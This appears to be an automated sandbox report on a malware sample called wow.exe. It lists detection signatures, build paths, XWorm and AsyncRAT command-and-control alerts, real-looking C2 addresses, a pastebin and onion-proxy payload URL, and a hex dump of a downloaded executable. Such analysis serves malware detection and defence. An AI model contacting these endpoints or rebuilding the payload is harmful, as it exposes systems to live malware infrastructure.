                            Source: Yara matchFile source: 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.2378224963.0000000002D03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2241882672.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2236543751.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2241600609.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2241972537.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2241749942.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.2378224963.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001A.00000002.2378224963.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.2240746392.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: wow.exe PID: 6092, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\Downloads\haus\hausey.txt, type: DROPPED
                            Source: C:\Users\user\Desktop\wow.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info\LICENSE.txtJump to behavior
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49928 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49996 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50032 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:50065 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50127 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:50129 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51664 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51768 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.131.244.47:443 -> 192.168.2.6:51907 version: TLS 1.2
                            Source: wow.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: explorer.pdbUGP source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_uuid.pdb source: wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_overlapped.pdb source: wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: wow.exe, 00000000.00000003.2159812724.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Private\Downloads\KDP-compatible-driver-loader-main\KDP-compatible-driver-loader-main\Loader\Compiled\Loader.pdb source: Loader.exe, 0000000A.00000000.2256564650.00007FF6B9583000.00000002.00000001.01000000.00000023.sdmp, Loader.exe, 0000000A.00000002.4626555247.00007FF6B9583000.00000002.00000001.01000000.00000023.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_multiprocessing.pdb source: wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ers\Private\Downloads\KDP-compatible-driver-loader-main\KDP-compatible-driver-loader-main\Loader\Compiled\Loader.pdb source: wow.exe, 00000009.00000003.3069520822.000001D428E03000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2821519239.000001D428DF9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2915312969.000001D428DF9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2963862992.000001D428E02000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: explorer.pdb source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmp
                            Source: Binary string: Task32Watch.pdb source: wow.exe, 00000009.00000003.2377176921.000001D42C330000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2540988639.000001D42C330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: svchost.pdb source: sel1.exe, 0000000C.00000002.2273554875.0000000000480000.00000040.10000000.00040000.00000000.sdmp, svchost.exe
                            Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: svchost.pdbUGP source: sel1.exe, 0000000C.00000002.2273554875.0000000000480000.00000040.10000000.00040000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\Document_26390\bin\Debug\Secured\Enalib.pdb source: wow.exe, 00000009.00000003.2994891214.000001D42D52C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2479967055.000001D42D554000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2448526134.000001D42CDFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2562218180.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2351696699.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2563582335.000001D42CC81000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2572286803.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3066267715.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2879381009.000001D42CE01000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3003548070.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbNN source: wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: wow.exe, 00000009.00000003.2432947411.000001D42C321000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2377176921.000001D42C300000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-311\Release\win32evtlog.pdb source: wow.exe, 00000000.00000003.2190025964.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wow.exe, 00000000.00000003.2159339518.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\_asyncio.pdb source: wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: Task32Watch.pdbl source: wow.exe, 00000009.00000003.2377176921.000001D42C330000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2540988639.000001D42C330000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: wow.exe, 00000009.00000003.2601584380.000001D42D5A9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2888440615.000001D42CB7E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2740289558.000001D42CEC9000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2881627835.000001D42CEEA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2566541064.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2678253097.000001D42CEC6000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2572286803.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2593037162.000001D42CB66000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2879781021.000001D42CEC5000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2845057481.000001D42CB66000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2364327641.000001D42D59A000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B7800 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6D80B7800
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80B8840 FindFirstFileExW,FindClose,0_2_00007FF6D80B8840
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80D2AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6D80D2AE4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_05278DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_05278DE0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_052760E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_052760E0
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ABC.exe_31e11bf93792b57bcaa916c941cfadda12f9c15_b789ba7e_e9ba41e7-d39d-4dea-8c02-28012e458a1f\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WatchDog.exe_406a6ee21591e5a47d53f4d2912b1e35074aa74_c0f2c9f8_8caea912-d054-496b-9f7d-a459c8d4789d\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\
                            Source: C:\Windows\SysWOW64\WerFault.exeFile opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

                            Software Vulnerabilities

                            barindex
                            Suspicious execution chain found
                            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h26_2_00F14668
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BCCA8
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BCC89h26_2_051BC878
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BD57F
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BD592
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD87Ah26_2_051BD7B8
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BDA54h26_2_051BD7B8
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BDA67h26_2_051BD7B8
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD87Ah26_2_051BD7A7
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BDA54h26_2_051BD7A7
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BD37B
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BD372
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BD370
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]26_2_051B6D18
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]26_2_051B6D0F
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]26_2_051B6D0D
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BD794h26_2_051BCC98
                            Source: C:\Users\user\Downloads\haus\conhost.exeCode function: 4x nop then jmp 051BDA54h26_2_051BD86B

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:49787 -> 5.252.155.72:80
                            Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:49794 -> 45.138.183.226:80
                            Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49796 -> 121.127.231.166:80
                            Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49780 -> 121.127.231.160:80
                            Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:49758 -> 45.141.26.234:80
                            Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 121.127.231.166:80 -> 192.168.2.6:49796
                            Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 121.127.231.160:80 -> 192.168.2.6:49780
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 18.230.108.113:1533 -> 192.168.2.6:50038
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 18.230.108.113:1533 -> 192.168.2.6:50038
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50038 -> 18.230.108.113:1533
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.138.183.226:8972 -> 192.168.2.6:50132
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:50132 -> 45.138.183.226:8972
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.138.183.226:8972 -> 192.168.2.6:50132
                            Source: Network trafficSuricata IDS: 2834937 - Severity 1 - ETPRO MALWARE Observed DNS Query to Abused DDNS (loseyourip .com) : 192.168.2.6:51771 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 162.244.210.121:6606 -> 192.168.2.6:52680
                            Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 162.244.210.121:6606 -> 192.168.2.6:52680
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 191.96.207.118:1999 -> 192.168.2.6:54086
                            Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 162.244.210.121:6606 -> 192.168.2.6:52680
                            Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 162.244.210.121:6606 -> 192.168.2.6:52680
                            Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 191.96.207.118:1999 -> 192.168.2.6:54086
                            Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 191.96.207.118:1999 -> 192.168.2.6:54086
                            Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 191.96.207.118:1999 -> 192.168.2.6:54086
                            Source: Network trafficSuricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49838 -> 185.199.108.133:443
                            Source: Network trafficSuricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.6:49836 -> 185.199.111.133:443
                            Source: Network trafficSuricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 185.199.108.133:443 -> 192.168.2.6:49838
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.230.108.113 80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: https://pastebin.com/raw/7G6zzQwJ
                            Source: Malware configuration extractorURLs: http://www.jrsoftware.org/ishelp/index.php
                            Connects to a pastebin service (likely for C&C)
                            Source: unknownDNS query: name: pastebin.com
                            Creates HTML files with .exe extension (expired dropper behavior)
                            Source: C:\Users\user\Desktop\wow.exeFile created: srqinsv.exe.9.dr
                            Source: C:\Users\user\Desktop\wow.exeFile created: rtqagvxp.exe.9.dr
                            Source: C:\Users\user\Desktop\wow.exeFile created: tqvaxy.exe.9.dr
                            Found Tor onion address
                            Source: wow.exe, 00000009.00000003.2236543751.000001D428E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qlqd5zqefmkcr34a.onion.sh/win/checking.hta
                            Source: wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qlqd5zqefmkcr34a.onion.sh/win/checking.hta
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 8085
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 8081
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 8088
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 6001
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 9900
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 5465
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 8099
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 5001
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4433
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 5000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49834
                            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49819
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49818
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49805
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 801 -> 49814
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49847
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49801
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8088 -> 49812
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 6001 -> 49813
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49802
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49809
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49807
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5465 -> 49816
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9900 -> 49815
                            Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49850
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49800
                            Source: unknownNetwork traffic detected: HTTP traffic on port 8085 -> 49797
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPE
                            Source: unknownNetwork traffic detected: IP country count 22
                            Source: global trafficTCP traffic: 192.168.2.6:49774 -> 159.65.122.137:8080
                            Source: global trafficTCP traffic: 192.168.2.6:49788 -> 185.208.159.240:8080
                            Source: global trafficTCP traffic: 192.168.2.6:49791 -> 185.180.108.247:8080
                            Source: global trafficTCP traffic: 192.168.2.6:49792 -> 5.181.3.225:8080
                            Source: global trafficTCP traffic: 192.168.2.6:49795 -> 216.9.224.66:5000
                            Source: global trafficTCP traffic: 192.168.2.6:49797 -> 123.114.81.161:8085
                            Source: global trafficTCP traffic: 192.168.2.6:49798 -> 123.112.97.90:8085
                            Source: global trafficTCP traffic: 192.168.2.6:49803 -> 111.176.23.239:8081
                            Source: global trafficTCP traffic: 192.168.2.6:49805 -> 111.176.20.173:8081
                            Source: global trafficTCP traffic: 192.168.2.6:49812 -> 120.26.164.174:8088
                            Source: global trafficTCP traffic: 192.168.2.6:49813 -> 45.192.96.63:6001
                            Source: global trafficTCP traffic: 192.168.2.6:49814 -> 83.229.122.83:801
                            Source: global trafficTCP traffic: 192.168.2.6:49815 -> 82.156.0.140:9900
                            Source: global trafficTCP traffic: 192.168.2.6:49816 -> 159.75.114.131:5465
                            Source: global trafficTCP traffic: 192.168.2.6:49818 -> 124.71.164.7:5001
                            Source: global trafficTCP traffic: 192.168.2.6:49858 -> 31.214.180.12:81
                            Source: global trafficTCP traffic: 192.168.2.6:50038 -> 18.230.108.113:1533
                            Source: global trafficTCP traffic: 192.168.2.6:50132 -> 45.138.183.226:8972
                            Source: global trafficTCP traffic: 192.168.2.6:50180 -> 5.253.59.205:7777
                            Source: global trafficTCP traffic: 192.168.2.6:50184 -> 42.51.37.127:33399
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 04 Dec 2024 00:14:55 GMTETag: "5b08-62866abe40176"Accept-Ranges: bytesContent-Length: 23304Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 85 37 da ea c1 56 b4 b9 c1 56 b4 b9 c1 56 b4 b9 8a 2e b5 b8 c3 56 b4 b9 7a 37 b5 b8 c2 56 b4 b9 c1 56 b5 b9 e7 56 b4 b9 ae d7 bc b8 c4 56 b4 b9 ae d7 4b b9 c0 56 b4 b9 ae d7 b6 b8 c0 56 b4 b9 52 69 63 68 c1 56 b4 b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 ce 9e 4f 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 16 00 00 00 24 00 00 00 00 00 00 a0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 06 00 01 00 06 00 01 00 00 00 00 00 00 80 00 00 00 04 00 00 eb 1e 01 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 44 00 00 3c 00 00 00 00 70 00 00 40 03 00 00 00 60 00 00 fc 00 00 00 00 38 00 00 08 23 00 00 00 00 00 00 00 00 00 00 08 42 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 14 00 00 00 10 00 00 00 16 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 17 00 00 00 30 00 00 00 18 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 04 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 fc 00 00 00 00 60 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 03 00 00 00 70 00 00 00 04 00 00 00 34 00 00 00 00 00 00 00 00 00 